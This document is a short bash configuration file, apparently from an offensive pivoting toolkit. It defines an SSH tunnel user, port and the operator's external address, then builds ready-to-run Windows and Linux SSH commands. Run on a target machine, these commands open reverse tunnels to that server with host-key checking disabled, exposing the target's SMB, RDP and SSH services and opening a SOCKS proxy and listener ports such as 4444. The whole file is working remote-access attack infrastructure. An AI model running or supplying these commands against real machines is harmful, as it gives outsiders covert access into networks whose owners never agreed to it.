#!/bin/bash

# Username for account used by SSH reverse tunnel
export SSHUSER=tunnel

# Port where SSH service is listening
export SSHPORT=443

# External IP address or domain name of web server
export LHOST=$(curl -s ifconfig.io)

# Port to run web server on
export LPORT=80

# SSH Server GatewayPorts setting
export GWPORTS=no

# Windows SSH command
export WINCMD="ssh.exe $SSHUSER@$LHOST -p $SSHPORT -i id_rsa -N  -o \"StrictHostKeyChecking=no\" -R 127.0.0.1:10445:127.0.0.1:445 -R 127.0.0.1:13389:127.0.0.1:3389 -L 0.0.0.0:8888:127.0.0.1:18888 -L 0.0.0.0:8433:127.0.0.1:18443 -L 0.0.0.0:8080:127.0.0.1:18080 -L 0.0.0.0:4444:127.0.0.1:14444 -R 10000"

# Linux SSH command
export LCMD="ssh -o \"StrictHostKeyChecking=no\" -p $SSHPORT $SSHUSER@$LHOST -nNT -i id_rsa -R 127.0.0.1:20022:127.0.0.1:22 -R 127.0.0.1:$RANDOM:127.0.0.1:22 -L 0.0.0.0:8888:127.0.0.1:28888 -L 0.0.0.0:8433:127.0.0.1:28443 -L 0.0.0.0:8080:127.0.0.1:28080 -L 0.0.0.0:4444:127.0.0.1:24444 -R 20000"

